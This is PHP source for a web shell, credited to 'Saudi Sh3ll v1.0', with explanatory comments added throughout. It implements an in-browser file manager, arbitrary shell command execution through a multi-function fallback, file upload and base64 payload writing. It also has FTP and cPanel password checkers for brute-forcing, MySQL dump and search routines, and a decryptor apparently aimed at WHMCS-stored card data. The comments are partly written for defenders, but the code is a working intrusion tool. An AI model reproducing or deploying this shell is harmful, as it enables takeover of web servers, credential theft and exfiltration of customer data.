// which does not match the label offered in the form.
if ($pir == '755'
)

{
   $cd = @chmod($_POST['file'],0775);
}
elseif ($pir == '777')
       {
   $cd = @chmod($_POST['file'],0777);

       }
elseif ($pir == '644')
{

// Double assignment is harmless; $cd simply receives chmod()'s result.
$cd = $cd = @chmod($_POST['file'],0644);

}

// Any other 'ch' value leaves $cd unset, which is reported as "ERROR".
if(!$cd)
{
echo "ERROR";

}else
{

echo "changed Successfully";
echo "<br /><br /><a href='?sws=chmod&file=$file&dir=$dir'\">[ Back ]</a>";


}

}
}
3099 
// ?sws=edit — in-browser file editor; ?sws=dow — raw download.
// Paths are $dir."/".$file straight from the query string, with no
// containment or type check. $pg is defined outside this chunk.
if ($_GET['sws'] == 'edit')
{

$file = $_GET['file'];
$dir = $_GET['dir'];

if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}

if (!isset($_POST['ed']))
{

// Read the whole file into the textarea. The handle $fil33 is never closed
// (released only when the request ends). A missing file yields an empty
// textarea rather than an error because every call is suppressed.
$fil33 = @fopen($dir."/".$file, 'r');
$content = @fread($fil33, @filesize($dir."/".$file));

echo "
<div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
<a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
<br />
dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
<form method=\"post\">
<br /><textarea cols=\"85\" rows=\"25\" name=\"fil3\">";
// Only the file body is entity-encoded; the links above are not.
echo htmlentities($content) . "\n";
echo '
</textarea>
<br /><br />
<input type="submit" name="ed" value="Save !"/>
</form>

';

}
else
{


// Save: truncate and overwrite with POST 'fil3' (stripslashes() is a
// magic_quotes-era workaround). fwrite() returns the byte count, so saving
// an empty body (0 bytes) is reported as "Error". header() has no return
// value; the echo in front of it prints nothing.
$oo = @fopen($dir."/".$file, 'w');
      $ow =   @fwrite($oo, @stripslashes($_POST['fil3']));
        @fclose($oo);
        if (!$ow){echo "Error";}else {
          echo header("Location: ?sws=edit&file=$file&dir=$dir");
          }





}




}
else if ($_GET['sws'] == 'dow')
{
$file = $_GET['file'];
$dir = $_GET['dir'];

// sa_download() sends the file as an attachment and exits; see its notes.
@sa_download ($dir."/".$file);


}
3161 /////////////////////////////////////////////////////
// ?sws=rm / mkdir / mkfile / up / rfile / cmd / site — remaining file-manager
// actions, one if/else-if chain. GET sws selects the action; the payload
// arrives as POST 'dir' and POST 'n4me' (or GET dir/file for rm and rfile).
// $pg is defined outside this chunk (presumably the script's own URL).
if ($_GET['sws'] == 'rm')
{

$dir = $_GET['dir'];

$file = $_GET['file'];

if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}

// First request: action bar plus a single "Delete" confirmation button.
if (!isset($_POST['edit']))
{

echo "<br />
<div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
<a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
<br />
dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
<form method='post'>
<input type='submit' value='Delete' name='edit' />

</form>

 ";
}else
{


// Try unlink() first, then rmdir() for directories.
$rn = @unlink ($dir."/".$file);

if(!$rn)
{


$rn = @rmdir ($dir."/".$file);



// NOTE(review): the two `!$rn` branches below test the same condition as the
// branch above and can never run, so the cmd("rm …") fallbacks are dead code.
}elseif (!$rn)
{
 $rn =  @cmd("cd $dir;rm $file");

}
else if (!$rn){@cmd ("cd $dir;rm -r $file");}
else{

echo header("Location: $pg?dir=$dir");
}

// Redirect back to the listing regardless of whether anything was removed.
echo header("Location: $pg?dir=$dir");

}
}
///////////////////////////////////////////////////////////////////////////////// mkdir //////////////////////////////

else if ($_GET['sws'] == 'mkdir')
{


$dir = $_POST['dir'];
$file = $_POST['n4me'];

$mkdir = @mkdir ($dir."/".$file,0755);

// On failure the raw values go into a shell command via cmd(). The second
// header() call repeats the redirect already issued in the else branch.
if (!$mkdir){@cmd ("mkdir $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
header("Location: $pg?dir=$dir");

}


else if ($_GET['sws'] == 'mkfile')
{

$dir = $_POST['dir'];
$file = $_POST['n4me'];


// fopen(…,'w') creates/truncates the file; the handle in $mkdir is never
// closed. Unlike mkdir above, the fallback path sends no redirect.
$mkdir = @fopen($dir."/".$file,'w');

if (!$mkdir){@cmd ("touch $dir/$file ");}else {header("Location: $pg?dir=$dir"); }


}

else if ($_GET['sws'] == 'up')
{


$dir = $_POST['dir'];


// Destination name is the client-supplied original filename, unsanitised.
if(@move_uploaded_file($_FILES['upfile']['tmp_name'], $dir."/".$_FILES['upfile']['name'])) { header("Location: $pg?dir=$dir"); }
   else { echo '<br /><br />Not uploaded !!<br><br>';exit; }

}


//////////////////////////// read file /////////////////////

else if ($_GET['sws'] == 'rfile')
{



// Path is POST 'n4me' if given, else GET dir/file.
$file = $_POST['n4me'];

echo "dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />  ";

if (!isset($file)){$file = $_GET['dir']."/".$_GET['file'];}

echo "<div>";

$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "<pre>".htmlentities($content)."</pre>";
}
// Fallback when fopen() fails: show_source() (an alias of highlight_file()).
else if (!$r3ad)
{
echo "<pre>";
$r3ad = @show_source($file) ;
echo "</pre>";
}
// NOTE(review): the remaining `!$r3ad` branches repeat the condition above
// and are unreachable, so the highlight_file() and symlink('sym.txt')
// attempts below never execute.
else if (!$r3ad)
{
echo "<pre>";
$r3ad = @highlight_file($file);
echo "</pre>";
}
else if (!$r3ad)
{
echo "<pre>";
$sm = @symlink($file,'sym.txt');


if ($sm){
$r3ad = @fopen('sym.txt', 'r');
$content = @fread($r3ad, @filesize($dir."/".$file));
echo "<pre>".htmlentities($content)."</pre>";
}
}

echo "</div>";

//////////////////////// cmd /////////////////////////////////


}else if ($_GET['sws'] == 'cmd')
{
// POST 'n4me' is the command text, POST 'dir' the working directory; both
// are concatenated into one shell line and run through cmd(). The output is
// echoed into the textarea without any escaping.
$cmd = $_POST['n4me'];
$dir = $_POST['dir'];

if (isset($cmd))
{


echo "<br /><textarea cols='65' rows='25' name='fil3'> ";

echo @cmd("cd $dir;$cmd") ;

echo " </textarea>";



}




}
else if ($_GET['sws'] == 'site')
{




// Reverse-IP lookup via an external web service; $ips is not set anywhere
// in this chunk. findit() extracts the first <pre>…</pre> block.
$read = @file_get_contents("http://networktools.nl/reverseip/$ips") ;

$sit3 = @findit($read,"<pre>","</pre>");

echo "<br /><div class='site'><pre> ";


echo $sit3;

echo "</pre> </div>";

exit;


}
3352 
3353 
3354 
3355 
3356 
3357 
3358 
3359 
3360 
3361 
// Bottom toolbar of the file manager: recomputes $dir from GET (the literal
// value 'nullz' bypasses cleandir()) and prints the five action forms.
// $dir and $pg are interpolated into the HTML attributes unescaped.
if(@$_GET['dir']){
    $dir = $_GET['dir'];
    if($dir != 'nullz') $dir = cleandir($dir);
}

// Each form posts 'n4me' plus a hidden 'dir' to the matching ?sws= handler
// (mkdir, rfile, mkfile, cmd, up). The "Change dir" form is a GET whose typed
// value is sent as parameter 'name'; no handler for 'name' is visible in this
// chunk. Note the stray '' after method='GET'.
echo "

<br /><br />
</div><div class='d0n'>
<br /><br />
<table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"   >

<tr><td><form method='GET''>
Change dir : <br />
<input type='text' name='name' value='$dir' size='25' />
<input type='hidden'  name='dir' value='$dir' />

<input type='submit' value='Go' />
</form> </td>

<td style=\"float: left\">  <form method='POST' action='$pg?sws=mkdir' >

Make dir :<br />
<input type='text' name='n4me' size='25' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Go' /></div>
</form></td></tr>


<tr><td><form method='post' action='$pg?sws=rfile'>
read file : <br />
<input type='text' name='n4me' size='25' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Go' />
</form> </td>


<td style=\"float: left\">  <form method='post'  action='$pg?sws=mkfile' >

Make file :<br />
<div style=\"text-align: right\">
<input type='text' name='n4me' size='25' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Go' /></div>
</form></td></tr>


<tr><td><form method='POST' action='$pg?sws=cmd'>
Execute : <br />
<input type='text' name='n4me' size='25' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Go' />
</form> </td>
<b></b>


<td style=\"float: left\">
<form method='POST' enctype=\"multipart/form-data\" action='$pg?sws=up' >
Upload file :<br />
<div style=\"text-align: right\">
<input type='file' name='upfile' value='Choose file' size='21' />
<input type='hidden'  name='dir' value='$dir' />
<input type='submit' value='Up' />
</form></td></tr>



</table>
 </div>
";
3432 //////////////////////////////////////// exit :d //////////////////////////
3433 
3434 
3435 
3436 
3437 
3438 
3439 
3440 
3441 
3442 
3443 
3444 
3445 
3446 
3447 
3448 
3449 
3450 
3451 
3452 
3453 
3454 
3455 
// Runs the shell command string $cfe and returns its output as one string.
// Tries, in order, exec(), shell_exec(), system(), passthru() and popen(),
// taking the first that is available; every call is error-suppressed.
// Returns '' when $cfe is empty or when none of the executors is usable.
// Defender note: because of this fallback chain, a disable_functions list
// has to cover all five names (exec, shell_exec, system, passthru, popen) —
// function_exists() reports disabled functions as absent, so removing only
// one of them just shifts execution to the next branch.
function cmd($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    @exec($cfe,$res);
    $res = join("\n",$res);   // exec() returns the output as an array of lines
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    @ob_start();             // system() prints directly; capture it via output buffering
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    @ob_start();             // same capture trick for passthru()
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }   // read the pipe in 1 KiB chunks
   @pclose($f);
  }
 }
 return $res;
}
3493 
/**
 * HTML spacer: returns $i copies of the "&nbsp;" entity concatenated.
 * The call is error-suppressed, matching the rest of the file's style.
 */
function sa($i)
{
    $spacer = "&nbsp;";
    return @str_repeat($spacer, $i);
}
3498 
3499 
3500 
// Decrypts a base64 blob produced by the matching home-grown "encrypt" routine.
// The parameter name matches the cc_encryption_hash setting of WHMCS, so this
// presumably targets data stored by that application — not verifiable here.
// Depends on the sibling _hash() function.
//
// Layout of base64_decode($string): [IV, strlen(hash_key) bytes][ciphertext].
// Key schedule: key = md5(md5(h)) . md5(h); hash_key = _hash(key).
// Returns the plaintext. There is no integrity check, so a wrong
// $cc_encryption_hash yields garbage rather than an error.
function decrypt ($string,$cc_encryption_hash)
{
    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    $hash_length = strlen ($hash_key);   // 20 bytes with sha1, 16 with the md5 fallback
    $string = base64_decode ($string);
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    // Unmask the stored IV with hash_key, byte by byte.
    while ($c < $hash_length)
    {
        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
        ++$c;
    }

    // The unmasked IV is the keystream for the first block. At every later
    // block boundary the keystream is re-derived from the previous keystream
    // and the previous plaintext block, so blocks are chained.
    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
        if (($c != 0 AND $c % $hash_length == 0))
        {
            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
        }

        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
        ++$c;
    }

    return $out;
}
3532 
3533 
/**
 * Binary digest helper for decrypt(): the raw (non-hex) sha1 of $string, or
 * raw md5 when sha1() is unavailable. Every pair of hex digits of the digest
 * becomes one byte of the result.
 */
function _hash ($string)
{
    $hex = function_exists('sha1') ? sha1($string) : md5($string);
    $raw = '';
    foreach (str_split($hex, 2) as $pair) {
        $raw .= chr(hexdec($pair));
    }
    return $raw;
}
3546 
// Dumps MySQL tables ('*' = every table, otherwise an array or comma-separated
// list) as CREATE TABLE + INSERT statements and writes the text to $path.
// Connection and query errors are suppressed, so a bad login simply produces
// an empty or partial dump; nothing is returned.
// NOTE(review): uses the mysql_* extension and ereg_replace(), both removed
// in PHP 7.0 — this function is a fatal error on any current PHP. $return is
// appended to before it is ever initialised, and the `for ($i …)` loop around
// the row loop is redundant: the inner while() drains $result on its first pass.
function backup_tables($path,$host,$user,$pass,$name,$tables = '*')
{

  $link = @mysql_connect($host,$user,$pass);
  @mysql_select_db($name,$link);

  //get all of the tables
  if($tables == '*')
  {
    $tables = array();
    $result = @mysql_query('SHOW TABLES');
    while($row = @mysql_fetch_row($result))
    {
      $tables[] = $row[0];
    }
  }
  else
  {
    $tables = is_array($tables) ? $tables : explode(',',$tables);
  }

  //cycle through
  foreach($tables as $table)
  {
    // Table names are concatenated into the SQL text unquoted.
    $result = mysql_query('SELECT * FROM '.$table);
    $num_fields = mysql_num_fields($result);

       $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
       $return.= "\n\n".$row2[1].";\n\n";

    for ($i = 0; $i < $num_fields; $i++)
    {
      while($row = mysql_fetch_row($result))
      {
        $return.= 'INSERT INTO '.$table.' VALUES(';
        for($j=0; $j<$num_fields; $j++)
        {
          // Escape quotes/backslashes and fold newlines into literal "\n".
          $row[$j] = addslashes($row[$j]);
          $row[$j] = ereg_replace("\n","\\n",$row[$j]);
          if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
          if ($j<($num_fields-1)) { $return.= ','; }
        }
        $return.= ");\n";
      }
    }
    $return.="\n\n\n";
  }

  //save file
  // The dump is written wherever $path points; the handle errors are suppressed.
  $handle = @fopen($path,'w+');
  @fwrite($handle,$return);
  @fclose($handle);
}
3600 
// Finds every (table, column) pair in the currently selected database whose
// text contains $string: lists tables via SHOW TABLE STATUS, takes the column
// names from each table's first row, then runs LIKE queries per table and
// per column. Returns a list of array('table' => ..., 'column' => ...).
// NOTE(review): $string is interpolated straight into LIKE '%…%' without any
// escaping, and table/column names are not parameterised either — this is
// SQL injection whenever $string is caller-controlled. Also relies on the
// mysql_* extension (removed in PHP 7.0); tables whose first row cannot be
// fetched are skipped silently.
function search($string){
    $q = mysql_query("SHOW TABLE STATUS");
    $data = array();
    while($table = mysql_fetch_array($q)){
        $query = "SELECT * FROM $table[Name]";
        $result = mysql_query($query);
        $row = @mysql_fetch_assoc($result);
        if(!$row){
            continue;   // empty table or failed query: no column list, skip it
        }
        $columns = array_keys($row);
        $data[$table['Name']] = $columns;
    }
    // Pass 1: tables with at least one matching row (any column).
    $tables = array();
    foreach($data as $table=>$columns){
        $query = "SELECT * FROM `$table` WHERE ";
        foreach($columns as $key=>$column){
            if($key == 0){
                $query .= "`$column` LIKE '%$string%'";
            }else{
                $query .= " OR `$column` LIKE '%$string%'";
            }
        }
        $query = mysql_query($query);
        $result = mysql_num_rows($query);
        if($result > 0){
            $tables[] = $table;
        }
    }
    // Pass 2: narrow each matching table down to the matching columns.
    $founded = array();
    foreach($tables as $table){
        $columns = $data[$table];
        foreach($columns as $column){
            $query = "SELECT * FROM `$table` WHERE `$column` LIKE '%$string%'";
            $query = mysql_query($query);
            $result = mysql_num_rows($query);
            if($result > 0){
                $founded[] = array('table'=>$table,'column'=>$column);
            }
        }
    }
    return $founded;
}
3644 
3645     function cleandir($d){ // Function to clean up the $dir and $curdir variables
3646     $d = @realpath($d);
3647     $d = str_replace("\\\\", "\\", $d);
3648     $d = str_replace("////", "//", $d);
3649     return($d);
3650 }
3651 
/**
 * Wraps wsoPerms() output for $f in a <font> tag whose colour encodes the
 * web-server user's access: #FF0000 = not readable, white = readable but not
 * writable, #25ff00 = writable. The checks are error-suppressed, so a missing
 * path is reported as "not readable".
 */
function wsoPermsColor($f) {
    if (!@is_readable($f)) {
        $color = '#FF0000';
    } elseif (!@is_writable($f)) {
        $color = 'white';
    } else {
        $color = '#25ff00';
    }
    return '<font color=' . $color . '>' . @wsoPerms(@fileperms($f)) . '</font>';
}
3660 
/**
 * Renders a numeric st_mode ($p, as returned by fileperms()) in `ls -l` form:
 * one type letter followed by the rwx triplets for owner, group and other,
 * with setuid/setgid/sticky folded into the x positions as s/S and t/T.
 * Unrecognised type bits give 'u'.
 */
function wsoPerms($p) {
    // File-type masks, tested in this order because they overlap.
    $types = array(
        array(0xC000, 's'),
        array(0xA000, 'l'),
        array(0x8000, '-'),
        array(0x6000, 'b'),
        array(0x4000, 'd'),
        array(0x2000, 'c'),
        array(0x1000, 'p'),
    );
    $out = 'u';
    foreach ($types as $entry) {
        list($mask, $letter) = $entry;
        if (($p & $mask) == $mask) {
            $out = $letter;
            break;
        }
    }
    // (read, write, execute, special bit, letter when x set, letter when x clear)
    $triplets = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
    );
    foreach ($triplets as $t) {
        list($r, $w, $x, $special, $withX, $withoutX) = $t;
        $out .= ($p & $r) ? 'r' : '-';
        $out .= ($p & $w) ? 'w' : '-';
        if ($p & $x) {
            $out .= ($p & $special) ? $withX : 'x';
        } else {
            $out .= ($p & $special) ? $withoutX : '-';
        }
    }
    return $out;
}
3681 
/**
 * Four-digit octal permission string for $file (e.g. "0644"), i.e. the last
 * four octal digits of fileperms(); "????" when the path does not exist.
 */
function perm($file)
{
    if (!file_exists($file)) {
        return "????";
    }
    $octal = @sprintf('%o', @fileperms($file));
    return @substr($octal, -4);
}
3693 
// Streams the file at $path to the client as an attachment and terminates the
// script. The dow handler passes $dir."/".$file straight from the query
// string, so whatever the PHP process can read is served.
// NOTE(review): no is_file()/is_readable() check — for a missing path the
// Content-Length header is still sent (with filesize()'s false result) and
// readfile() then fails after headers are out; the script's error_reporting(0)
// hides the warning. basename($path) is placed in Content-Disposition
// unquoted, so names containing spaces or ';' produce a malformed header.
function sa_download($path)
   {
   header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($path));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($path));
    ob_clean();   // discard anything already buffered so the body is the file alone
    flush();
    readfile($path);
    exit;
   }
3709 
3710     function findit($mytext,$starttag,$endtag) {
3711  $posLeft  = @stripos($mytext,$starttag)+strlen($starttag);
3712  $posRight = @stripos($mytext,$endtag,$posLeft+1);
3713  return  @substr($mytext,$posLeft,$posRight-$posLeft);
3714 }
3715 
/**
 * Coloured HTML label saying whether the mssql extension is loaded
 * (checked via the presence of mssql_connect()).
 */
function MsSQL()
{
    $available = @function_exists('mssql_connect');
    return $available
        ? '<font color="red">ON</font>'
        : '<font color="green">OFF</font>';
}
/**
 * Coloured HTML label saying whether the legacy mysql extension is loaded
 * (checked via the presence of mysql_connect()).
 */
function MySQL2()
{
    $label = '<font color="green">OFF</font>';
    if (@function_exists('mysql_connect')) {
        $label = '<font color="red">ON</font>';
    }
    return $label;
}
/**
 * Coloured HTML label saying whether zlib's gzencode() is available.
 */
function Gzip()
{
    $on  = '<font color="red">ON</font>';
    $off = '<font color="green">OFF</font>';
    return @function_exists('gzencode') ? $on : $off;
}
/**
 * Coloured HTML label saying whether the mysqli extension is loaded
 * (checked via the presence of mysqli_connect()).
 */
function MysqlI()
{
    $label = '<font color="green">OFF</font>';
    if (@function_exists('mysqli_connect')) {
        $label = '<font color="red">ON</font>';
    }
    return $label;
}
/**
 * Coloured HTML label saying whether the mSQL extension is loaded
 * (checked via the presence of msql_connect()).
 */
function MSQL()
{
    $available = @function_exists('msql_connect');
    return $available
        ? '<font color="red">ON</font>'
        : '<font color="green">OFF</font>';
}
/**
 * Coloured HTML label saying whether the pgsql extension is loaded
 * (checked via the presence of pg_connect()).
 */
function PostgreSQL()
{
    $on  = '<font color="red">ON</font>';
    $off = '<font color="green">OFF</font>';
    return @function_exists('pg_connect') ? $on : $off;
}
3789 
/**
 * Coloured HTML label saying whether the OCI8 extension is loaded
 * (checked via the presence of ocilogon()).
 */
function Oracle()
{
    $label = '<font color="green">OFF</font>';
    if (@function_exists('ocilogon')) {
        $label = '<font color="red">ON</font>';
    }
    return $label;
}
3802 
3803 
/**
 * Coloured HTML label for the register_globals ini setting. On PHP builds
 * without that directive ini_get() returns false, which reads as OFF.
 */
function RegisterGlobals()
{
    $enabled = @ini_get('register_globals');
    return $enabled
        ? '<font color="red">ON</font>'
        : '<font color="green">OFF</font>';
}
/**
 * Human-readable byte count: picks the largest of GB/MB/KB that $size reaches,
 * rounds to two decimals, and appends the unit; anything under 1024 is
 * reported in bytes. Returns a string such as "1.5 KB".
 */
function HardSize($size)
{
    // Thresholds in descending order so the first match is the right unit.
    $units = array(
        1073741824 => " GB",
        1048576    => " MB",
        1024       => " KB",
    );
    foreach ($units as $divisor => $suffix) {
        if ($size >= $divisor) {
            return @round($size / $divisor * 100) / 100 . $suffix;
        }
    }
    return $size . " B";
}
// Probe: is the curl extension loaded?  Unlike the sibling probes this asks
// extension_loaded() rather than function_exists(). Returns red "ON" /
// green "OFF" as an HTML fragment. The ftp_check()/cpanel_check() helpers
// further down depend on this extension being present.
function Curl()
{
    $loaded = extension_loaded('curl');
    $color  = $loaded ? 'red' : 'green';
    $text   = $loaded ? 'ON' : 'OFF';

    return "<font color=\"$color\">$text</font>";
}
3848 
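// Probe: report magic_quotes_gpc as red "ON" / green "OFF" (HTML fragment).
//
// Fix: get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in 8.0;
// calling it there throws an Error (with error_reporting(0) the page simply
// goes blank). Probe for the function first and treat its absence as OFF,
// which is also the truthful answer: magic quotes were removed in PHP 5.4.
// Any non-empty value from the legacy call is reported as ON, as before.
function magicQouts()
{
    $enabled = false;
    if (@function_exists('get_magic_quotes_gpc')) {
        $enabled = @get_magic_quotes_gpc();
    }

    if (empty($enabled)) {
        return '<font color="green">OFF</font>';
    }

    return '<font color="red">ON</font>';
}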
3862 
// Probe: is open_basedir configured?  Reads the ini value and reports red
// "ON" when it is non-empty, green "OFF" otherwise. Only the presence of a
// restriction is reported; the configured path list itself is discarded.
// Returns an HTML fragment.
function openBaseDir()
{
    $restricted = (bool) @ini_get("open_basedir");
    if (!$restricted) {
        return '<font color="green">OFF</font>';
    }

    return '<font color="red">ON</font>';
}
3876 
// Single-shot FTP credential test (the shell's FTP brute-force helper).
// Asks libcurl for a name-only directory listing of ftp://$host using
// $user:$pass, with CURLOPT_FAILONERROR so a login rejection surfaces as a
// curl error. Outcomes, by curl_errno():
//   28 (CURLE_OPERATION_TIMEDOUT) -> prints a timeout message and exits
//    0                             -> prints the working user/password pair
//   anything else                 -> prints nothing
// The trailing exit is unconditional, so the script terminates after ONE
// attempt regardless of outcome; a caller loop can never test a second pair
// in the same request. $host, $user and $pass are interpolated into the URL
// and the HTML output without escaping. CURLOPT_HTTPAUTH is an HTTP option
// and is presumably a no-op on an FTP URL; it is kept to match the original.
function ftp_check($host,$user,$pass,$timeout){
    $conn = curl_init();
    curl_setopt($conn, CURLOPT_URL, "ftp://$host");
    curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($conn, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
    curl_setopt($conn, CURLOPT_FTPLISTONLY, 1);
    curl_setopt($conn, CURLOPT_USERPWD, "$user:$pass");
    curl_setopt($conn, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($conn, CURLOPT_FAILONERROR, 1);

    curl_exec($conn);
    $errno = curl_errno($conn);

    if ($errno == 28) {
        // Timed out: report and stop (handle is intentionally left unclosed, as before).
        echo "<b> Error : Connection timed out </b>";
        exit;
    }

    if ($errno == 0) {
        echo "\n<b>found username : <font color='#FF0000'> $user </font> - password :\n<font color='#FF0000'> $pass </font></b><br>";
    }

    curl_close($conn);
    exit;
}
3899 
3900 
// Single-shot cPanel credential test: one HTTP Basic-auth request to
// http://$host:2082 (cPanel's plain-HTTP port) with $user:$pass, and
// CURLOPT_FAILONERROR so a 401 becomes a curl error. Outcomes, by
// curl_errno():
//   28 (CURLE_OPERATION_TIMEDOUT) -> prints a timeout message and exits
//    0                             -> prints the working user/password pair
//   anything else                 -> prints nothing
// Like ftp_check(), the final exit is unconditional, so only one pair is
// ever tested per request. Credentials travel in cleartext on port 2082
// and are echoed into the HTML unescaped. From a detection standpoint, an
// outbound Basic-auth request to TCP/2082 originating from a web server
// process is a good signature for this helper.
function cpanel_check($host,$user,$pass,$timeout){
    $conn = curl_init();
    curl_setopt($conn, CURLOPT_URL, "http://$host:2082");
    curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($conn, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
    curl_setopt($conn, CURLOPT_USERPWD, "$user:$pass");
    curl_setopt($conn, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($conn, CURLOPT_FAILONERROR, 1);

    curl_exec($conn);
    $errno = curl_errno($conn);

    if ($errno == 28) {
        // Timed out: report and stop (handle is intentionally left unclosed, as before).
        echo "<b> Error : Connection timed out</b>";
        exit;
    }

    if ($errno == 0) {
        echo "\n<b>found username : <font color='#FF0000'>$user</font> - password :\n<font color='#FF0000'>$pass </font></b><br>";
    }

    curl_close($conn);
    exit;
}
3920 
3921 
// Drop a payload to disk: base64-decode $t and write it to path $f,
// truncating or creating the file. This is the shell's file-writer
// primitive, so defenders should expect it to be the origin of any
// attacker-planted files on a host where this script ran.
// All failures are silenced with @ and nothing is returned. The original's
// "or @function_exists('file_put_contents')" after fopen() was a no-op
// (assignment binds tighter than `or`, and function_exists has no side
// effects), so it is omitted here: there never was a file_put_contents
// fallback. base64_decode runs in non-strict mode, so invalid characters
// in $t are skipped rather than rejected.
function op_sa($f,$t) {
    $handle = @fopen($f, "w");
    if (!$handle) {
        return;
    }

    @fwrite($handle, @base64_decode($t));
    @fclose($handle);
}
3929 
3930 
// Page footer: closes markup opened earlier in the file (presumably the main
// layout table/div) and prints the author / mirror credits. $pg is assigned
// elsewhere in the file (not visible here) and is interpolated into an href
// unescaped; presumably it is the script's own URL, since the link targets
// the ?sws= dispatcher. The constant strings "Progr4m3r by", "oy3@hotmail.com"
// and "r57.gen.tr" survive across copies of this shell and make useful
// content signatures for scanners.
$footer  = '</td></tr></table></div> |';
$footer .= "<b class='foter'>Progr4m3r by <a href='" . $pg . "?sws=ab'>al-swisre Edited: r57.gen.tr</a></b>|";
$footer .= "<b class='foter'>E-m4il : <a href='#'>oy3@hotmail.com</a></b>|";
$footer .= "<b class='foter'>r57 shell : <a target='_blank' href='http://r57.gen.tr'>r57 shell</a></b>| </html> ";
echo $footer;
3932 
3933 
3934 
3935 ?>

Screenshot of Saudi Sh3ll v1.0

Saudi Shell screenshot

Saudi Shell screenshot